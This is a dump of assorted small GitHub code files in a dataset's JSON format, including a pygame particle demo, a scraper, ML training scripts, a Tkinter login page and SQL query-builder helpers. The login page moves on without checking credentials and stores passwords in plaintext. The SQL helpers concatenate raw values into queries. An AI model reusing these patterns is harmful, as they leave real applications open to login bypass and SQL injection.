in self.particles:\n particle.draw()\n \n def remove_particle(self, particle):\n i = self.particles.index(particle)\n del self.particles[i]\n\ndef main():\n\n pygame.init()\n\n screen = pygame.display.set_mode((800, 600))\n pygame.display.set_caption(\"Particle System\")\n\n particle_system_1 = ParticleSystem(100, [100, 300])\n particle_system_2 = ParticleSystem(100, [200, 300], color=pygame.Vector3(.9, 0.3, 0))\n particle_system_3 = ParticleSystem(100, [300, 300], color=pygame.Vector3(0, 0, 1))\n particle_system_4 = ParticleSystem(100, [400, 300], color=pygame.Vector3(0, 1, 0))\n\n clock = pygame.time.Clock()\n delta = 0\n times = 0\n while True:\n clock.tick()\n fps = clock.get_fps()\n if times%50 == 0:\n print(f\"fps: {fps}\")\n times += 1\n if fps:\n delta = 1/fps\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n particle_system_1.update(delta)\n particle_system_2.update(delta)\n particle_system_3.update(delta)\n particle_system_4.update(delta)\n \n screen.fill((100, 100, 100))\n particle_system_1.draw()\n particle_system_2.draw()\n particle_system_3.draw()\n particle_system_4.draw()\n pygame.display.update()\n\nif __name__ == \"__main__\":\n main()","repo_name":"ReubenKabiti/smoke-particle-system-pygame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"37286740411","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\nclass SA():\n def get_div(self, user):\n league = user + '#leagues'\n doc = requests.get(league).text\n soup = BeautifulSoup(doc, 'lxml')\n \n teams = soup.find_all(class_='list-group list-group-flush mb-4')\n teams = soup.find_all(class_='row ml-0') if not teams else teams\n newest_team = \"\"\n for team in teams:\n if 'ultiduo' not in team.text.strip().lower():\n newest_team = team.text.strip()\n break\n \n try:\n league = re.findall(r' in (.*?) on ', newest_team)[0]\n except IndexError:\n try:\n league = re.findall(r' in (.*?) for ', newest_team)[0]\n except IndexError:\n league = \"\"\n new_league = self.convert_to_season_rank(league)\n return new_league\n \n def convert_to_season_rank(self, league):\n divs = ['Elite', 'Central', 'Acesso', 'Aberta', 'Iniciante']\n div = [x for x in divs if x.lower() in league.lower()]\n\n try:\n return ['FBTF - ' + div[0] + ' ' + \"6's\"]\n except IndexError:\n return ['FBTF - ' + 'Iniciante' + ' ' + \"6's\"]\n","repo_name":"Astatham98/Rahbot","sub_path":"divgetters/sa_player_id_get.py","file_name":"sa_player_id_get.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"18710063092","text":"from pymor.basic import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\ndef fom_objective_functional(fom, mu):\n \"\"\" This method evaluates the full order model (FOM) at the given parameter |mu|.\n\n Parameters\n ----------\n fom\n The FOM that gets evaluated.\n mu \n The parameter for which the FOM is evaluated.\n\n Returns \n -------\n value_FOM\n The value od the FOM at the parameter |mu|.\n \"\"\"\n value_FOM = fom.output(mu)[0,0]\n return value_FOM\n\ndef compute_value_matrix(fom, f, x, y):\n \"\"\"\n Computes the value of the |fom| at the given coordinates |x| and |y|. \n\n Parameters\n fom \n The FOM that gets evaluated.\n f \n The function that gets called.\n x\n |x| coordinates of the evaluation.\n y\n |y| coordinates of the evaluation.\n\n Returns \n -------\n xx \n meshgrid of x and y.\n yy \n meshgrid of x and y.\n f_of_x \n The evaluation of the function |f|.\n\n \"\"\"\n f_of_x = np.zeros((len(x), len(y)))\n for ii in range(len(x)):\n for jj in range(len(y)):\n f_of_x[ii][jj] = f(fom, (x[ii], y[jj]))\n xx, yy = np.meshgrid(x, y)\n return xx, yy, f_of_x\n\n\ndef plot_3d_surface(fom, f, x, y, alpha=1):\n \"\"\" plots the function f as a 3D plot with contour lines. \n\n Parameters \n ----------\n fom \n The |fom| corresponding to the function |f|.\n f \n The function that gets plotted.\n x \n meshgrid of points to determine the range.\n y \n meshgrid of points to determine the range.\n alpha \n fill density of the plot.\n \"\"\"\n mpl.rcParams['figure.figsize'] = (12.0, 8.0)\n mpl.rcParams['font.size'] = 12\n mpl.rcParams['savefig.dpi'] = 300\n mpl.rcParams['figure.subplot.bottom'] = .1\n mpl.rcParams['axes.facecolor'] = (0.0, 0.0, 0.0, 0.0)\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n x, y, f_of_x = compute_value_matrix(fom, f, x, y)\n ax.contour(x,y,f_of_x, levels=10, zdir='z', offset=1)\n ax.plot_surface(x, y, f_of_x, cmap='Blues',\n linewidth=0, antialiased=False, alpha=alpha)\n \n ax.view_init(elev=27.7597402597, azim=-39.6370967742)\n ax.set_xlim3d([-0.10457963, 3.2961723])\n ax.set_ylim3d([-0.10457963, 3.29617229])\n ax.set_zlim3d([1,10])\n ax.set_ylabel(r'$\\mu_1$')\n ax.set_xlabel(r'$\\mu_2$')\n plt.show(block=True)","repo_name":"ullmannsven/Bachelorarbeit","sub_path":"2D_PDE_optimization_problem/contour_plot_objective_function.py","file_name":"contour_plot_objective_function.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6035140866","text":"\"\"\"\nGroup By\n\"\"\"\nfrom itertools import groupby, tee\n\nalunos = [\n {'nome': 'Luiz', 'nota':'A'},\n {'nome': 'Daniel', 'nota':'B'},\n {'nome': 'Maria', 'nota':'C'},\n {'nome': 'Bruno', 'nota':'D'},\n {'nome': 'Carlos', 'nota':'E'},\n {'nome': 'Jessica', 'nota':'F'},\n {'nome': 'Lucas', 'nota':'B'},\n {'nome': 'Anderson', 'nota':'C'},\n {'nome': 'José', 'nota':'A'}\n]\n\n# Lambda para ordenar o dicionário\nordena = lambda item: item['nota']\n\n\n# Ordenando os alunos pelas notas\nalunos.sort(key=ordena)\n\n# Conferencia da ordenação\n# for aluno in alunos:\n# print(aluno)\n\n\nalunosAgrupados = groupby(alunos, ordena)\n\nfor agrupamento, valoresAgrupados in alunosAgrupados:\n va1, va2 = tee(valoresAgrupados)\n\n print(f'Agrupamento {agrupamento}')\n\n for aluno in va1:\n print(f'\\t{aluno[\"nome\"]}')\n\n quantidade = len(list(va2))\n print(f'\\t{quantidade} alunos tiraram a nota {agrupamento}')\n print()\n","repo_name":"Daniel-Silva97/Python-Basico-Ao-Avancado","sub_path":"1 - pythonModuloBasico/funcoesUteis/groupBy/groupBy.py","file_name":"groupBy.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"40110387761","text":"from oslo_versionedobjects import fields\n\nfrom DSpace import db\nfrom DSpace import exception\nfrom DSpace import objects\nfrom DSpace.objects import base\n\n\n@base.StorObjectRegistry.register\nclass AlertGroup(base.StorPersistentObject, base.StorObject,\n base.StorObjectDictCompat, base.StorComparableObject):\n\n fields = {\n 'id': fields.IntegerField(),\n 'name': fields.StringField(),\n 'alert_rule_ids': fields.ListOfIntegersField(nullable=True),\n 'email_group_ids': fields.ListOfIntegersField(nullable=True),\n 'cluster_id': fields.UUIDField(),\n 'alert_rules': fields.ListOfObjectsField('AlertRule', nullable=True),\n 'email_groups': fields.ListOfObjectsField('EmailGroup', nullable=True)\n }\n\n OPTIONAL_FIELDS = ('alert_rules', 'email_groups')\n\n def create(self):\n if self.obj_attr_is_set('id'):\n raise exception.ObjectActionError(action='create',\n reason='already created')\n updates = self.stor_obj_get_changes()\n\n db_cluster = db.alert_group_create(self._context, updates)\n self._from_db_object(self._context, self, db_cluster)\n\n def save(self):\n updates = self.stor_obj_get_changes()\n if updates:\n db.alert_group_update(self._context, self.id, updates)\n\n self.obj_reset_changes()\n\n def destroy(self):\n updated_values = db.alert_group_destroy(self._context, self.id)\n self.update(updated_values)\n self.obj_reset_changes(updated_values.keys())\n\n @classmethod\n def _from_db_object(cls, context, obj, db_obj, expected_attrs=None):\n expected_attrs = expected_attrs or []\n\n if 'alert_rules' in expected_attrs:\n alert_rules = db_obj.get('alert_rules', [])\n obj.alert_rules = [objects.AlertRule._from_db_object(\n context, objects.AlertRule(context), alert_rule\n ) for alert_rule in alert_rules]\n\n if 'email_groups' in expected_attrs:\n email_groups = db_obj.get('email_groups', [])\n obj.email_groups = [objects.EmailGroup._from_db_object(\n context, objects.EmailGroup(context), email_group\n ) for email_group in email_groups]\n\n return super(AlertGroup, cls)._from_db_object(context, obj, db_obj)\n\n\n@base.StorObjectRegistry.register\nclass AlertGroupList(base.ObjectListBase, base.StorObject):\n\n fields = {\n 'objects': fields.ListOfObjectsField('AlertGroup'),\n }\n\n @classmethod\n def get_all(cls, context, filters=None, marker=None, limit=None,\n offset=None, sort_keys=None, sort_dirs=None,\n expected_attrs=None):\n alert_groups = db.alert_group_get_all(context, marker, limit,\n sort_keys, sort_dirs, filters,\n offset, expected_attrs)\n return base.obj_make_list(context, cls(context), objects.AlertGroup,\n alert_groups, expected_attrs=expected_attrs)\n\n @classmethod\n def get_count(cls, context, filters=None):\n count = db.alert_group_get_count(context, filters)\n return count\n","repo_name":"yalezhangk/ceph_storage","sub_path":"DSpace/objects/alert_group.py","file_name":"alert_group.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15945181727","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nimport sqlite3\r\n\r\ndef nextPage():\r\n ws.destroy()\r\n import Email\r\n\r\nf = ('Times', 14,)\r\n\r\n\r\ncon = sqlite3.connect('userdata.db')\r\ncur = con.cursor()\r\ncur.execute('''CREATE TABLE IF NOT EXISTS record(\r\n name text, \r\n email text, \r\n contact number, \r\n gender text, \r\n country text,\r\n password text\r\n )\r\n ''')\r\ncon.commit()\r\n\r\n \r\n\r\nws = Tk()\r\nws.title('Login Page')\r\nws.geometry('400x300')\r\nws.config(bg='#000000')\r\nws.iconbitmap('images.png')\r\n \r\n\r\ndef login_response():\r\n try:\r\n con = sqlite3.connect('userdata.db')\r\n c = con.cursor()\r\n for row in c.execute(\"Select * from record\"):\r\n username = row[1]\r\n pwd = row[5]\r\n \r\n except Exception as ep:\r\n messagebox.showerror('', ep)\r\n\r\n uname = email_tf.get()\r\n upwd = pwd_tf.get()\r\n check_counter=0\r\n if uname == \"\":\r\n warn = \"Username can't be empty\"\r\n else:\r\n check_counter += 1\r\n if upwd == \"\":\r\n warn = \"Password can't be empty\"\r\n else:\r\n check_counter += 1\r\n if check_counter == 2:\r\n if (uname == username and upwd == pwd):\r\n messagebox.showinfo('Login Status', 'Logged in Successfully!')\r\n \r\n else:\r\n messagebox.showerror('Login Status', 'invalid username or password')\r\n else:\r\n messagebox.showerror('', warn)\r\n\r\n#Variables \r\nvar = StringVar()\r\nvar.set('male')\r\n\r\ncountries = []\r\nvariable = StringVar()\r\nworld = open('countries.txt', 'r')\r\nfor country in world:\r\n country = country.rstrip('\\n')\r\n countries.append(country)\r\nvariable.set(countries[22])\r\n\r\n# widgets\r\nexit_button = Button(ws, text=\"Exit\", command=ws.destroy,bg='#FF0000')\r\nexit_button.pack(pady=0,padx=0)\r\n\r\nleft_frame = Frame(\r\n ws, \r\n bd=2, \r\n bg='#000000', \r\n relief=SOLID, \r\n padx=10, \r\n pady=10, \r\n borderwidth = 0\r\n )\r\n\r\nLabel(\r\n left_frame, \r\n text=\"Enter Email\",\r\n borderwidth = 0, \r\n bg='#000000',fg='#b8860b',\r\n font=f).grid(row=0, column=0, sticky=W, pady=10)\r\n\r\nLabel(\r\n left_frame, \r\n text=\"Enter Password\", \r\n bg='#000000',\r\n font=f,fg='#b8860b'\r\n ).grid(row=1, column=0, pady=10)\r\n\r\nemail_tf = Entry(\r\n left_frame, \r\n font=f,\r\n bd=1,bg='#f8f8ff'\r\n )\r\npwd_tf = Entry(\r\n left_frame, \r\n font=f,\r\n show='*',\r\n bd=1,bg='#f8f8ff'\r\n )\r\nlogin_btn = Button(\r\n left_frame, \r\n width=15, \r\n text='Login', \r\n font=f, \r\n relief=SOLID,\r\n cursor='hand2',\r\n command=nextPage,\r\n bd=0,\r\n bg='#000000',fg='#b8860b'\r\n )\r\n\r\ntransporter = Button(\r\n left_frame,\r\n width=15, \r\n text='Login', \r\n font=f, \r\n relief=SOLID,\r\n command=nextPage,\r\n bd=0,\r\n bg='#000000',fg='#b8860b'\r\n)\r\n\r\n\r\n\r\n\r\n# widgets placement\r\nemail_tf.grid(row=0, column=1, pady=10, padx=20)\r\npwd_tf.grid(row=1, column=1, pady=10, padx=20)\r\nlogin_btn.grid(row=2, column=1, pady=10, padx=20)\r\nleft_frame.place(relx=0.5, rely=0.5, anchor=CENTER)\r\nexit_button.place(x=0,y=0)\r\n\r\n\r\n# infinite loop\r\nws.mainloop()","repo_name":"KeeganG12/Tkinter-Project","sub_path":"Tkinter Project/login2.py","file_name":"login2.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72906727632","text":"import os\nclass Answers:\n def __init__(self, partOne: int = 0, partTwo: int = 0) -> None:\n self.__partOne = partOne\n self.__partTwo = partTwo\n\n @property\n def partOne(self):\n return self.__partOne\n\n @property\n def partTwo(self):\n return self.__partTwo\n\nfrom itertools import islice\n\ndef window(seq, n=4):\n \"Returns a sliding window (of width n) over data from the iterable\"\n \" s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... \"\n it = iter(seq)\n result = tuple(islice(it, n))\n if len(result) == n:\n yield result\n for elem in it:\n result = result[1:] + (elem,)\n yield result\n\n\ndef readFile(filepath):\n with open(os.path.join(os.path.dirname(__file__), filepath)) as file:\n line = file.readline()\n while line:\n yield line.rstrip(\"\\n\")\n line = file.readline()\n\n\ndef solutionOne(fileName: str):\n result = 0\n number_of_characters = 4\n for line in readFile(f\"{fileName}.txt\"):\n for index, chars in enumerate(window(line, number_of_characters)):\n charset = set(chars)\n if len(charset) == len(chars):\n result = index+number_of_characters\n break\n return result\n\n\ndef solutionTwo(fileName: str):\n result = 0\n number_of_characters = 14\n for line in readFile(f\"{fileName}.txt\"):\n for index, chars in enumerate(window(line, number_of_characters)):\n charset = set(chars)\n if len(charset) == len(chars):\n result = index+number_of_characters\n break\n return result\n\n\nif __name__ == \"__main__\":\n answer = Answers(5, 23)\n assert solutionOne(\"test\") == answer.partOne\n print(\"Part One: \", solutionOne(\"input\"))\n assert solutionTwo(\"test\") == answer.partTwo\n print(\"Part Two: \", solutionTwo(\"input\"))\n","repo_name":"damien-deathstalker/Advent-of-Code","sub_path":"2022/Day 06/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42432280015","text":"from util import *\n\n\n@apply\ndef apply(contains):\n x, domain = contains.of(Element)\n assert domain in Interval(0, S.Pi, left_open=True, right_open=True)\n return Greater(sin(x), 0)\n\n\n@prove(proved=False)\ndef prove(Eq):\n from axiom import geometry\n\n x = Symbol(real=True)\n Eq << apply(Element(x, Interval(0, S.Pi, left_open=True, right_open=True)))\n\n Eq << geometry.sin.to.sum.apply(sin(x))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n run()\n# created on 2020-11-19\n","repo_name":"cosmosZhou/sympy","sub_path":"axiom/geometry/el/imply/sin_gt_zero.py","file_name":"sin_gt_zero.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"13384255992","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\"\"\"\nLogging.\n\nScript to log items to a log file.\n\"\"\"\nimport logging\n\n\ndef doc(t, m):\n \"\"\"\n Document a log entry to the log file.\n\n :param t: Type of log entry to record. Can be one of info, debug, warn,\n error, critical, exception or general.\n :type t: string\n :param m: Log message text.\n :type m: string\n\n :returns: Log file with message.\n :rtype: mixed\n \"\"\"\n logger = logging.getLogger(__name__)\n logging.basicConfig(\n level=logging.NOTSET,\n format='🕒 %(asctime)s :~$ %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='./logs/app.log'\n )\n\n if \"critical\" is t:\n data = logger.critical(f\"‼️ {m}\")\n elif \"error\" is t:\n data = logger.error(f\"🔴 {m}\")\n elif \"warning\" is t:\n data = logger.warning(f\"🟠 {m}\")\n elif \"debug\" is t:\n data = logger.debug(f\"🐛 {m}\")\n elif \"except\" is t:\n data = logger.exception(f\"❌ {m}\")\n elif \"general\" is t:\n data = logger.info(f\"{m}\")\n else:\n data = logger.info(f\"🟢 {m}\")\n\n return data\n\n\ndef tail(m):\n \"\"\"\n Document a log entry to the log file.\n\n :param m: Log message text.\n :type m: string\n\n :returns: Log file with message.\n :rtype: mixed\n \"\"\"\n logger = logging.getLogger(__name__)\n logging.basicConfig(\n level=logging.NOTSET,\n format='%(message)s',\n filename='./logs/app.log'\n )\n\n return logger.info(m)\n","repo_name":"justinhartman/cloudapp-webhook","sub_path":"modules/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"8506320121","text":"from torch.utils import data\nimport torch.optim as optim\nfrom SRdatasetRGB import SRdatasetRGB\nfrom lapsrn import *\nimport shutil\n\n\ndef save_ckp(state, is_best, checkpoint_path, best_model_path):\n \"\"\"\n state: checkpoint we want to save\n is_best: is this the best checkpoint; min validation loss\n checkpoint_path: path to save checkpoint\n best_model_path: path to save best model\n \"\"\"\n f_path = checkpoint_path\n # save checkpoint data to the path given, checkpoint_path\n torch.save(state, f_path)\n # if it is a best model, min validation loss\n if is_best:\n best_fpath = best_model_path\n # copy that checkpoint file to best path given, best_model_path\n shutil.copyfile(f_path, best_fpath)\n\n\ndef exp_lr_scheduler(optimizer, epoch, init_lr=0.001, lr_decay_epoch=100):\n \"\"\"Decay learning rate by a factor of 2 every lr_decay_epoch epochs.\"\"\"\n lr = init_lr * (0.5**(epoch // lr_decay_epoch))\n\n if epoch % lr_decay_epoch == 0:\n print('LR is set to {}'.format(lr))\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n return optimizer, lr\n\n\n# CUDA for PyTorch\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda:2\" if use_cuda else \"cpu\")\n\nmax_epochs = 1000\n\n# Generators\ntraining_set = SRdatasetRGB(\"train\")\ntraining_generator = data.DataLoader(training_set, batch_size=64, shuffle=True, num_workers=4, pin_memory=True)\n\nvalidation_set = SRdatasetRGB(\"validation\")\nvalidation_generator = data.DataLoader(validation_set, batch_size=64, shuffle=False, num_workers=1, pin_memory=True)\n\nnet = LapSrnMS(5, 5, 4)\n\nif use_cuda:\n net.to(device)\n\ncriterion = CharbonnierLoss()\noptimizer = optim.Adam(net.parameters(), lr=1e-4, weight_decay=1e-4)\n\nif __name__ == '__main__':\n # Loop over epochs\n loss_min = np.inf\n running_loss_valid = 0.0\n for epoch in range(max_epochs): # loop over the dataset multiple times\n optimizer, current_lr = exp_lr_scheduler(optimizer, epoch, init_lr=1e-4, lr_decay_epoch=20)\n running_loss_train = 0.0\n\n net.train()\n\n for i, data in enumerate(training_generator, 0):\n\n # get the inputs; data is a list of [inputs, labels]\n in_lr, in_2x, in_4x, in_rgb = data[0].to(device), data[1].to(device), data[2].to(device), data[3].to(device)\n\n # in_lr.requires_grad = True\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n out_2x, out_4x = net(in_rgb, in_lr)\n loss_2x = criterion(out_2x, in_2x)\n loss_4x = criterion(out_4x, in_4x)\n\n loss = (loss_2x + loss_4x) / in_lr.shape[0]\n\n loss.backward()\n # loss_2x.backward(retain_graph=True)\n\n # loss_4x.backward()\n\n # torch.nn.utils.clip_grad_norm_(net.parameters(), 0.01 / current_lr)\n\n optimizer.step()\n\n # print statistics\n running_loss_train += loss.item()\n if i % 100 == 99: # print every 5 mini-batches\n print('[%d, %5d] training loss: %.3f' %\n (epoch + 1, i + 1, running_loss_train / 100))\n running_loss_train = 0.0\n\n net.eval()\n\n for j, data_valid in enumerate(validation_generator, 0):\n in_lr, in_2x, in_4x, in_rgb = data[0].to(device), data[1].to(device), data[2].to(device), data[3].to(device)\n\n out_2x, out_4x = net(in_rgb, in_lr)\n loss_2x = criterion(out_2x, in_2x)\n loss_4x = criterion(out_4x, in_4x)\n\n loss = (loss_2x + loss_4x) / in_lr.shape[0]\n\n running_loss_valid += loss.item()\n\n running_loss_valid = running_loss_valid / len(validation_generator)\n\n print('[%d] validation loss: %.3f' %\n (epoch + 1, running_loss_valid))\n\n if running_loss_valid < loss_min:\n checkpoint = {\n 'epoch': epoch + 1,\n 'valid_loss_min': running_loss_valid,\n 'state_dict': net.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }\n save_ckp(checkpoint, True, \"ckp.pt\", \"best.pt\")\n loss_min = running_loss_valid\n\n running_loss_valid = 0.0\n\n print('Finished Training')","repo_name":"lorenzomammana/RGB-IR-LapSRN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"40964086161","text":"# Q :2331\n\n\nimport sys\n\n\ndef calc(num):\n global p\n num_arr = []\n while num != 0:\n num_arr.append(num%10)\n num //= 10\n\n result = 0\n for x in num_arr:\n result += x**p\n\n return result\n\n\na, p = map(int, sys.stdin.readline().rstrip().split())\n\ngraph = [a]\nborder = -1\n\nwhile True:\n val = calc(graph[-1])\n for (i, e) in enumerate(graph):\n if val == e:\n border = i\n break\n if border != -1:\n break\n else:\n graph.append(val)\n\nsys.stdout.write(str(border))","repo_name":"zerobell-lee/baekjoon-algorithm-study","sub_path":"repetive_seq.py","file_name":"repetive_seq.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"70238198672","text":"\"\"\"\nDemonstrates RoboSumo with pre-trained policies.\n\"\"\"\nimport click\nimport gym\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\nimport robosumo.envs\n\nfrom robosumo.policy_zoo import LSTMPolicy, MLPPolicy\nfrom robosumo.policy_zoo.utils import load_params, set_from_flat\n\nPOLICY_FUNC = {\n \"mlp\": MLPPolicy,\n \"lstm\": LSTMPolicy,\n}\n\n@click.command()\n@click.option(\"--env\", type=str,\n default=\"RoboSumo-Ant-vs-Ant-v0\", show_default=True,\n help=\"Name of the environment.\")\n@click.option(\"--policy-names\", nargs=2, type=click.Choice([\"mlp\", \"lstm\"]),\n default=(\"mlp\", \"mlp\"), show_default=True,\n help=\"Policy names.\")\n@click.option(\"--param-versions\", nargs=2, type=int,\n default=(1, 1), show_default=True,\n help=\"Policy parameter versions.\")\n@click.option(\"--max_episodes\", type=int,\n default=20, show_default=True,\n help=\"Number of episodes.\")\n\ndef main(env, policy_names, param_versions, max_episodes):\n # Construct paths to parameters\n curr_dir = os.path.dirname(os.path.realpath(__file__))\n params_dir = os.path.join(curr_dir, \"../robosumo/policy_zoo/assets\")\n agent_names = [env.split('-')[1].lower(), env.split('-')[3].lower()]\n param_paths = []\n for a, p, v in zip(agent_names, policy_names, param_versions):\n param_paths.append(\n os.path.join(params_dir, a, p, \"agent-params-v%d.npy\" % v)\n )\n\n # Create environment\n env = gym.make(env)\n\n for agent in env.agents:\n agent._adjust_z = -0.5\n\n tf_config = tf.ConfigProto(\n inter_op_parallelism_threads=1,\n intra_op_parallelism_threads=1)\n sess = tf.Session(config=tf_config)\n sess.__enter__()\n\n # Initialize policies\n policy = []\n for i, name in enumerate(policy_names):\n scope = \"policy\" + str(i)\n policy.append(\n POLICY_FUNC[name](scope=scope, reuse=False,\n ob_space=env.observation_space.spaces[i],\n ac_space=env.action_space.spaces[i],\n hiddens=[64, 64], normalize=True)\n )\n sess.run(tf.variables_initializer(tf.global_variables()))\n\n # Load policy parameters\n params = [load_params(path) for path in param_paths]\n for i in range(len(policy)):\n set_from_flat(policy[i].get_variables(), params[i])\n\n # Play matches between the agents\n num_episodes, nstep = 0, 0\n total_reward = [0.0 for _ in range(len(policy))]\n total_scores = [0 for _ in range(len(policy))]\n observation = env.reset()\n print(\"-\" * 5 + \"Episode %d \" % (num_episodes + 1) + \"-\" * 5)\n while num_episodes < max_episodes:\n env.render()\n action = tuple([\n pi.act(stochastic=True, observation=observation[i])[0]\n for i, pi in enumerate(policy)\n ])\n observation, reward, done, infos = env.step(action)\n\n nstep += 1\n for i in range(len(policy)):\n total_reward[i] += reward[i]\n if done[0]:\n num_episodes += 1\n draw = True\n for i in range(len(policy)):\n if 'winner' in infos[i]:\n draw = False\n total_scores[i] += 1\n print(\"Winner: Agent {}, Scores: {}, Total Episodes: {}\"\n .format(i, total_scores, num_episodes))\n if draw:\n print(\"Match tied: Agent {}, Scores: {}, Total Episodes: {}\"\n .format(i, total_scores, num_episodes))\n observation = env.reset()\n nstep = 0\n total_reward = [0.0 for _ in range(len(policy))]\n\n for i in range(len(policy)):\n policy[i].reset()\n\n if num_episodes < max_episodes:\n print(\"-\" * 5 + \"Episode %d \" % (num_episodes + 1) + \"-\" * 5)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"openai/robosumo","sub_path":"demos/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":287,"dataset":"github-code","pt":"83"} +{"seq_id":"40386537776","text":"# exist function\n# 'val' should be written within '...', that is only accepts string value\n# set 'condition'=[condition_string] to overwrite the use of 'var'='val'\n# the [value] should be ended with \"'\", and [other_value] should not be ended by \"'\"\n# function return a value of 't' or 'f'\ndef exist(table,var='0',val='0',condition=None):\n if not condition:\n condition=\"\"\" WHERE \"\"\"+var+\"\"\"=\"\"\"+str(val)\n else:\n condition=\"\"\" WHERE \"\"\"+condition\n que=\"\"\"SELECT EXISTS (SELECT * FROM \"\"\"+table+condition+\"\"\")\"\"\"\n return que\n \n# count function\n# 'val' should be written within '...', that is only accepts string value\n# set 'condition'=[condition_string] to overwrite the use of 'var'='val'\n# function returns an integer\ndef count(table,var='0',val='0',condition=None):\n if not condition:\n condition=\"\"\" WHERE \"\"\"+var+\"\"\"=\"\"\"+str(val)\n else:\n condition=\"\"\" WHERE \"\"\"+condition\n que=\"\"\"SELECT COUNT(*) FROM \"\"\"+table+condition\n return que\n \n# select function\n# 'val' should be written within '...', that is only accepts string value\n# set 'distinct'='yes' to perform SELECT DISTINCT...\n# set 'condition'=[condition_string] to overwrite the use of 'var'='val'\n# 'rows'=[integer] specifies how many rows should be selected\n# 'order'=[column_name] specifies which column should be a basis for sorting\n# function returns a tuple of format specified by 'split'\ndef select(table,column='*',var='0',val='0',distinct='no',rows=None,order=None,condition=None):\n if distinct=='yes':\n distinct=' DISTINCT'\n elif distinct=='no':\n distinct=\"\"\n if not rows:\n rows=\"\"\n else:\n rows=\"\"\" FETCH FIRST \"\"\"+str(rows)+\"\"\" ROWS ONLY\"\"\"\n if not order:\n order=\"\"\n else:\n order=\" ORDER BY \"+order\n if not condition:\n condition=\"\"\" WHERE \"\"\"+var+\"\"\"=\"\"\"+str(val)\n else:\n condition=\"\"\" WHERE \"\"\"+condition\n que=\"\"\"SELECT\"\"\"+distinct+\"\"\" \"\"\"+column+\"\"\" FROM \"\"\"+table+condition+order+rows\n return que\n \n# delete one/several row satisfying given condition 'var'='val'.\n# 'val' should be written within '...', that is only accepts string value\n# set 'condition'=[condition_string] to overwrite the use of 'var'='val'\n# 'limit'=[integer] specifies how many rows (max) should be removed at a time\n# 'order'=[column_name] specifies which column should be a basis for sorting\n# function returns None\ndef delete(table,var='0',val='0',limit=None,order=None,condition=None):\n lim_front=\"\"\n lim_back=\"\"\n order_by=\"\"\n if not condition:\n condition=\"\"\" WHERE \"\"\"+var+\"\"\"=\"\"\"+str(val)\n else:\n condition=\"\"\" WHERE \"\"\"+condition\n if limit:\n lim_front=\"\"\" WHERE ctid IN (SELECT ctid FROM \"\"\"+table\n lim_back=\"\"\" LIMIT \"\"\"+str(limit)+\"\"\")\"\"\"\n if order:\n order_by=\"\"\" ORDER BY \"\"\"+order\n que=\"\"\"DELETE FROM \"\"\"+table+lim_front+condition+order_by+lim_back\n return que\n\n# insert values into their respective columns.\n# 'column' is a 1-D list, consisting of column names,\n# column[column_number]\n# 'values' is a tuple of values to be inserted into columns,\n# values[row_number][column_number]\n# function returns None\ndef insert(table,column,values):\n col_str=\"\"\n val_str=\"\"\n for col in column:\n col_str=col_str+col+\"\"\",\"\"\"\n col_str=col_str[:len(col_str)-1]\n for i in range(len(values)):\n val_str+=\"\"\"(\"\"\"\n for val in values[i]:\n val_str+=\"\"\"\\'\"\"\"+str(val)+\"\"\"\\',\"\"\"\n val_str=val_str[:len(val_str)-1]\n val_str+=\"\"\"),\"\"\"\n val_str=val_str[:len(val_str)-1]\n que=\"\"\"INSERT INTO \"\"\"+table+\"\"\" (\"\"\"+col_str+\"\"\") VALUES \"\"\"+val_str\n return que\n\n# update content(s) of a table satisfying given condition 'var'='val'.\n# 'val' should be written within '...', that is only accepts string value\n# set 'condition'=[condition_string] to overwrite the use of 'var'='val'\n# 'update' is a list (tuple) of column,value pair,\n# [[col1,val1],[col2,val2],[col3,val3],...]\n# function returns None\ndef update(table,update,var='0',val='0',condition=None):\n upd_pairs=\"\"\n if not condition:\n condition=\"\"\" WHERE 